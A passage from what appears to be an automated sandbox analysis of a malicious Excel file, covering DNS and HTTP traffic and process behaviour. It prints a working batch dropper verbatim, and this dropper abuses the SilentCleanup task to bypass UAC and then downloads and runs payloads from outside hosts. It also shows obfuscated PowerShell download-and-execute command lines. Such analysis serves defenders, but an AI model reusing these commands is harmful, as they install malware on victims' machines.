Jan 5, 2021 10:08:53.643593073 CET	1973	49214	185.157.162.81	192.168.2.22
Jan 5, 2021 10:08:54.156944036 CET	49214	1973	192.168.2.22	185.157.162.81
Jan 5, 2021 10:08:54.314594984 CET	1973	49214	185.157.162.81	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2021 10:06:37.132224083 CET	52197	53	192.168.2.22	8.8.8.8
Jan 5, 2021 10:06:37.188653946 CET	53	52197	8.8.8.8	192.168.2.22
Jan 5, 2021 10:06:37.795423031 CET	53099	53	192.168.2.22	8.8.8.8
Jan 5, 2021 10:06:37.843441010 CET	53	53099	8.8.8.8	192.168.2.22
Jan 5, 2021 10:06:37.846391916 CET	52838	53	192.168.2.22	8.8.8.8
Jan 5, 2021 10:06:37.894357920 CET	53	52838	8.8.8.8	192.168.2.22
Jan 5, 2021 10:06:47.743778944 CET	61200	53	192.168.2.22	8.8.8.8
Jan 5, 2021 10:06:47.827884912 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 5, 2021 10:06:37.132224083 CET	192.168.2.22	8.8.8.8	0x7885	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Jan 5, 2021 10:06:47.743778944 CET	192.168.2.22	8.8.8.8	0x9bfe	Standard query (0)	speed-bg.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Jan 5, 2021 10:06:37.188653946 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cutt.ly	104.22.0.232	A (IP address)	IN (0x0001)
Jan 5, 2021 10:06:37.188653946 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cutt.ly	172.67.8.238	A (IP address)	IN (0x0001)
Jan 5, 2021 10:06:37.188653946 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cutt.ly	104.22.1.232	A (IP address)	IN (0x0001)
Jan 5, 2021 10:06:47.827884912 CET	8.8.8.8	192.168.2.22	0x9bfe	No error (0)	speed-bg.com	79.124.76.20	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

37.46.150.139

speed-bg.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49169	37.46.150.139	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2021 10:06:39.088344097 CET	71	OUT	GET /bat/scriptxls_687c7069-ef4b-4efe-b745-594285a9a92b_mic2_wddisabler.bat HTTP/1.1 Host: 37.46.150.139 Connection: Keep-Alive
Jan 5, 2021 10:06:39.137165070 CET	72	IN	HTTP/1.1 200 OK Date: Tue, 05 Jan 2021 09:06:39 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.12 Last-Modified: Tue, 05 Jan 2021 00:31:01 GMT ETag: "956-5b81c522fe197" Accept-Ranges: bytes Content-Length: 2390 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 6d 6f 64 65 20 31 38 2c 31 0d 0a 63 6f 6c 6f 72 20 46 45 0d 0a 73 65 74 6c 6f 63 61 6c 0d 0a 66 6f 72 20 2f 66 20 22 74 6f 6b 65 6e 73 3d 34 2d 35 20 64 65 6c 69 6d 73 3d 2e 20 22 20 25 25 69 20 69 6e 20 28 27 76 65 72 27 29 20 64 6f 20 73 65 74 20 56 45 52 53 49 4f 4e 3d 25 25 69 2e 25 25 6a 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 31 30 2e 30 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 31 30 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 74 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 6f 6b 2e 62 61 74 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 3a 2f 2f 73 70 65 65 64 2d 62 67 2e 63 6f 6d 2f 6b 61 70 61 33 2f 66 65 72 72 61 7a 69 6f 2f 74 79 70 6c 61 2f 6a 62 6d 2f 35 62 59 44 41 53 74 6f 65 4a 6e 4c 6d 72 6f 2e 65 78 65 27 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 73 62 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 73 62 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 28 6e 45 77 2d 6f 42 6a 65 60 63 54 20 4e 65 74 2e 57 65 62 63 4c 60 49 45 4e 74 29 2e 28 27 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 27 29 2e 49 6e 76 6f 6b 65 28 28 27 68 74 27 20 20 2b 20 20 20 27 74 70 73 3a 2f 2f 72 65 62 72 61 6e 64 2e 6c 79 2f 46 42 6f 62 66 75 27 29 2c 28 24 65 6e 76 3a 61 70 70 64 61 74 61 29 2b 27 5c 6f 6b 2e 62 61 Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.bat');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdata\sb.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke(('ht' + 'tps://rebrand.ly/FBobfu'),($env:appdata)+'\ok.ba
Jan 5, 2021 10:06:39.137238026 CET	73	IN	Data Raw: 74 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 61 70 70 64 61 74 61 5c 6f 6b 2e 62 61 74 3b 20 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 Data Ascii: t');Start-Sleep 2; Start-Process $env:appdata\ok.bat; Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('http://speed-bg.com/kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe',($env:appdata)+'\sb.exe');Start-Sleep 2; Start-Process $env:appdat
Jan 5, 2021 10:06:39.137267113 CET	74	IN	Data Raw: 65 3b 22 0d 0a 29 0d 0a 65 6e 64 6c 6f 63 61 6c 0d 0a 0d 0a 64 65 6c 20 70 64 2e 62 61 74 0d 0a 0d 0a 65 78 69 74 0d 0a Data Ascii: e;")endlocaldel pd.batexit

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49170	79.124.76.20	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 5, 2021 10:06:47.916533947 CET	74	OUT	GET /kapa3/ferrazio/typla/jbm/5bYDAStoeJnLmro.exe HTTP/1.1 Host: speed-bg.com Connection: Keep-Alive
Jan 5, 2021 10:06:47.998641968 CET	76	IN	HTTP/1.1 200 OK Date: Tue, 05 Jan 2021 09:06:47 GMT Server: Apache mod_bwlimited/1.4 Upgrade: h2,h2c Connection: Upgrade, Keep-Alive Last-Modified: Tue, 05 Jan 2021 00:27:38 GMT ETag: "74e447a-353000-5b81c46187603" Accept-Ranges: bytes Content-Length: 3485696 Keep-Alive: timeout=5 Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 b1 f3 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 1a 35 00 00 14 00 00 00 00 00 00 b2 38 35 00 00 20 00 00 00 40 35 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 35 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 38 35 00 4f 00 00 00 00 40 35 00 84 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 35 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b8 18 35 00 00 20 00 00 00 1a 35 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 11 00 00 00 40 35 00 00 12 00 00 00 1c 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 35 00 00 02 00 00 00 2e 35 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 38 35 00 00 00 00 00 48 00 00 00 02 00 05 00 20 5d 00 00 c0 43 00 00 03 00 00 00 65 00 00 06 e0 a0 00 00 80 97 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 04 00 00 06 00 2a 0a 00 2a 00 13 30 02 00 2b 00 00 00 01 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 16 00 00 0a 00 00 02 03 28 17 00 00 0a 00 2a 00 13 30 05 00 dd 07 00 00 02 00 00 11 00 d0 02 00 00 02 28 18 00 00 0a 73 19 00 00 0a 0a 02 73 1a 00 00 0a 7d 02 00 00 04 02 73 1b 00 00 0a 7d 04 00 00 04 02 73 1b 00 00 0a 7d 05 00 00 04 02 73 1b 00 00 0a 7d 06 00 00 04 02 73 1b 00 00 0a 7d 07 00 00 04 02 73 1c 00 00 0a 7d 08 00 00 04 02 73 1d 00 00 0a 7d 09 00 00 04 02 73 1e 00 00 0a 7d 03 00 00 04 02 7b 02 00 00 04 6f 1f 00 00 0a 00 02 7b 03 00 00 04 6f 20 00 00 0a 00 02 28 1f 00 00 0a 00 02 7b 02 00 00 04 18 6f 21 00 00 0a 00 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 04 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 22 00 00 0a 18 22 00 00 86 42 73 23 00 00 0a 6f 24 00 00 0a 26 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 03 00 00 04 16 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 04 00 00 04 17 16 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 05 00 00 04 17 17 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 06 00 00 04 17 18 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_0585 @5@ 5@`85O@5`5 H.text5 5 `.rsrc@55@@.reloc`5.5@B85H ]Ce4^}((*0+,{+,{o(0(ss}s}s}s}s}s}s}s}{o{o ({o!{o""Bs#o$&{o""Bs#o$&{o%{o&{o%{o&{o%{o&{o%{o&{o%
Jan 5, 2021 10:06:47.998667955 CET	77	IN	Data Raw: 02 7b 07 00 00 04 17 19 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 08 00 00 04 17 1a 6f 26 00 00 0a 00 02 7b 02 00 00 04 6f 25 00 00 0a 02 7b 09 00 00 04 17 1b 6f 26 00 00 0a 00 02 7b 02 00 00 04 1b 6f 27 00 00 0a 00 02 7b 02 00 00 Data Ascii: {o&{o%{o&{o%{o&{o'{s(o){rpo*{o+{o," As-o.&{o," As-o.&{o," As-o.&{o," As-o.&{
Jan 5, 2021 10:06:47.998933077 CET	78	IN	Data Raw: 06 72 4f 01 00 70 6f 3f 00 00 0a 74 1a 00 00 01 6f 40 00 00 0a 00 02 7b 03 00 00 04 19 19 73 28 00 00 0a 6f 29 00 00 0a 00 02 7b 03 00 00 04 72 79 01 00 70 6f 2a 00 00 0a 00 02 7b 02 00 00 04 02 7b 03 00 00 04 1c 6f 41 00 00 0a 00 02 7b 03 00 00 Data Ascii: rOpo?to@{s(o){rypo*{{oA{ s/o0{oB{oC{oD{(E"@"PAsF(G(H s/(I(J{oK(L(M
Jan 5, 2021 10:06:47.998955965 CET	80	IN	Data Raw: 33 00 02 7b 14 00 00 04 6f 45 00 00 06 16 6f 53 00 00 06 00 02 7b 14 00 00 04 6f 45 00 00 06 17 6f 51 00 00 06 00 00 2b 0b 00 02 28 1b 00 00 06 00 00 2b 00 2a 00 00 00 13 30 03 00 c2 01 00 00 08 00 00 11 00 02 7b 14 00 00 04 6f 44 00 00 06 02 7b Data Ascii: 3{oEoS{oEoQ+(+*0{oD{oEoTom{oD{oEoVoo{oEoV,G{oD{oEoYok{oD{oEoZXoi{oEoV
Jan 5, 2021 10:06:47.999157906 CET	81	IN	Data Raw: 11 0c 20 cb 8e fb 0e fe 02 16 fe 01 13 45 11 45 2c 08 11 0c 17 58 13 0c 2b 03 17 13 0c 20 17 8f fb 0e 13 0d 11 0d 20 df 8e fb 0e fe 02 13 46 11 46 2c 09 20 03 8f fb 0e 13 0d 2b 1d 11 0d 20 fa 8e fb 0e fe 02 16 fe 01 13 47 11 47 2c 08 11 0d 17 58 Data Ascii: EE,X+ FF, + GG,X+HH,+%II,+JJ,+%KK,+LL,+%MM,+ NN, +
Jan 5, 2021 10:06:47.999178886 CET	83	IN	Data Raw: 18 72 77 07 00 70 a2 0a 06 0b 2b 00 07 2a 00 00 13 30 05 00 ca 06 00 00 00 00 00 00 00 02 73 73 00 00 0a 7d 16 00 00 04 02 73 1e 00 00 0a 7d 17 00 00 04 02 02 7b 16 00 00 04 73 74 00 00 0a 7d 18 00 00 04 02 73 75 00 00 0a 7d 19 00 00 04 02 73 76 Data Ascii: rwp+*0ss}s}{st}su}sv}sv}sw}sv}sv}sv}sv} sv}!sx}"sy}#{o {o{"o({ 5
Jan 5, 2021 10:06:47.999249935 CET	84	IN	Data Raw: 00 00 1f 16 73 2f 00 00 0a 6f 30 00 00 0a 00 02 7b 22 00 00 04 18 6f 31 00 00 0a 00 02 7b 22 00 00 04 72 05 0a 00 70 6f 35 00 00 0a 00 02 7b 23 00 00 04 28 88 00 00 0a 6f 89 00 00 0a 00 02 7b 23 00 00 04 28 8a 00 00 0a 6f 8b 00 00 0a 00 02 7b 23 Data Ascii: s/o0{"o1{"rpo5{#(o{#(o{#rpo{#s/o"@"PAsF(G(H(o s/(I(J{"oK(J{oK(J{oK{(
Jan 5, 2021 10:06:47.999360085 CET	85	IN	Data Raw: 13 30 01 00 0c 00 00 00 0b 00 00 11 00 02 7b 33 00 00 04 0a 2b 00 06 2a e2 02 16 8d 1a 00 00 01 7d 31 00 00 04 02 16 8d 1a 00 00 01 7d 32 00 00 04 02 16 8d 1a 00 00 01 7d 33 00 00 04 02 16 8d 1a 00 00 01 7d 34 00 00 04 02 28 57 00 00 0a 00 2a 00 Data Ascii: 0{3+}1}2}3}4(W0){5(t\|5(+30){5(t\|5(+30{>+*0{?+
Jan 5, 2021 10:06:47.999598980 CET	87	IN	Data Raw: 13 04 11 04 02 7b 40 00 00 04 6f 9c 00 00 0a fe 04 13 06 11 06 3a 0c ff ff ff 16 13 07 38 92 01 00 00 11 07 17 58 13 08 38 69 01 00 00 02 7b 40 00 00 04 11 07 6f a2 00 00 0a 6f 81 00 00 06 02 7b 40 00 00 04 11 08 6f a2 00 00 0a 6f 81 00 00 06 59 Data Ascii: {@o:8X8i{@oo{@ooY((0){@oo{@oo;{@oo{@ooY((0&{@oo{@oo.d{@oo{@o
Jan 5, 2021 10:06:47.999624968 CET	88	IN	Data Raw: 2b 00 06 2a 13 30 02 00 24 00 00 00 01 00 00 11 00 03 2c 0a 03 15 2e 06 03 17 fe 01 2b 01 17 0a 06 2c 09 02 03 7d 4d 00 00 04 2b 07 02 16 7d 4d 00 00 04 2a 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 4b 00 00 04 0a 2b 00 06 2a 13 30 02 00 24 00 Data Ascii: +0$,.+,}M+}M0{K+0$,.+,}K+}K0{L+0$,.+,}L+}L0_sd}D(W}H }I
Jan 5, 2021 10:06:48.075020075 CET	90	IN	Data Raw: 00 11 00 02 7b 57 00 00 04 0a 2b 00 06 2a 26 00 02 03 7d 57 00 00 04 2a 00 00 13 30 01 00 0c 00 00 00 03 00 00 11 00 02 7b 58 00 00 04 0a 2b 00 06 2a 13 30 02 00 24 00 00 00 01 00 00 11 00 03 2c 0a 03 15 2e 06 03 17 fe 01 2b 01 17 0a 06 2c 09 02 Data Ascii: {W+&}W0{X+0$,.+,}X+}X0{Y+0$,.+,}Y+}Y0,%}W}V%(o(m}U*0s(l

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Jan 5, 2021 10:06:37.300777912 CET	104.22.0.232	443	192.168.2.22	49167	CN=www.cutt.ly CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Sat Feb 08 01:00:00 CET 2020 Thu Nov 02 13:24:33 CET 2017	Thu Apr 08 14:00:00 CEST 2021 Tue Nov 02 13:24:33 CET 2027	769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0	05af1f5ca1b87cc9cc9b25185115607d
Jan 5, 2021 10:06:37.300777912 CET	104.22.0.232	443	192.168.2.22	49167	CN=RapidSSL TLS RSA CA G1, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert Global Root G2, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Nov 02 13:24:33 CET 2017	Tue Nov 02 13:24:33 CET 2027		05af1f5ca1b87cc9cc9b25185115607d

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 944 Parent PID: 584

General

Start time:	10:06:42
Start date:	05/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f840000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2504 Parent PID: 944

General

Start time:	10:06:44
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2524 Parent PID: 944

General

Start time:	10:06:44
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2316 Parent PID: 944

General

Start time:	10:06:45
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2364 Parent PID: 2504

General

Start time:	10:06:45
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1616 Parent PID: 944

General

Start time:	10:06:45
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2704 Parent PID: 2524

General

Start time:	10:06:45
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 2772 Parent PID: 944

General

Start time:	10:06:46
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 2852 Parent PID: 2316

General

Start time:	10:06:46
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 2480 Parent PID: 1616

General

Start time:	10:06:46
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Chronological Activities

Analysis Process: powershell.exe PID: 1468 Parent PID: 2772

General

Start time:	10:06:47
Start date:	05/01/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/4jsSu5Q','pd.bat')
Imagebase:	0x13f420000
File size:	473600 bytes
MD5 hash:	852D67A27E454BD389FA7F02A8CBE23F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000011.00000002.2120343706.000000000389B000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	high

Chronological Activities

Analysis Process: attrib.exe PID: 3036 Parent PID: 2852

General

Start time:	10:06:49
Start date:	05/01/2021
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\attrib.exe' +s +h pd.bat
Imagebase:	0xffe90000
File size:	18432 bytes
MD5 hash:	C65C20C89A255517F11DD18B056CADB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2164 Parent PID: 2480

General

Start time:	10:06:56
Start date:	05/01/2021
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
Imagebase:	0x4aa40000
File size:	345088 bytes
MD5 hash:	5746BD7E255DD6A8AFA06F7C42C1BA41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: mode.com PID: 1944 Parent PID: 2164

General

Start time:	10:06:56
Start date:	05/01/2021
Path:	C:\Windows\System32\mode.com
